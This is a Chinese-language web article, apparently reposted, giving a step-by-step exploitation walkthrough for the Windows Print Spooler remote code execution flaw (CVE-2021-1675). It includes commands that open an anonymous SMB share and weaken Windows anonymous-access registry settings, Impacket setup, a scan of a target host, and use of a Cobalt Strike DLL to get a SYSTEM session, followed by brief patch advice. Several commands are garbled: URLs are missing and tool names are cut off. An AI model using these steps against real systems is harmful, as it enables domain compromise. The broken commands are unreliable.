- 漏洞描述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows Print Spooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
Github公布的地址:
2、漏洞准备
这里我们使用python版本的poc
地址:
首先创建一个可以允许匿名访问的smb
创建时使用powershell
mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot
3、漏洞利用
在运行漏洞利用之前,您需要安装Impacket 版本
pip3 uninstall impacket
git clone
cd impacket
python3 . install
可以使用r 来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的
r @192.168.1.10 | grep MS-RPRN
协议:[MS-RPRN]:打印系统远程协议
然后进行利用,这里使用dll是cs生成的dll
返回了system的会话
4、修复建议
安装微软 CVE-2021-1675 漏洞补丁
关闭打印机服务
1.《打印机漏洞分析怎么写文章看这里!Windows Print Spooler远程代码执行漏洞》援引自互联网,旨在传递更多网络信息知识,仅代表作者本人观点,与本网站无关,侵删请联系页脚下方联系方式。
2.《打印机漏洞分析怎么写文章看这里!Windows Print Spooler远程代码执行漏洞》仅供读者参考,本网站未对该内容进行证实,对其原创性、真实性、完整性、及时性不作任何保证。
3.文章转载时请保留本站内容来源地址,https://www.lu-xu.com/why/3131865.html
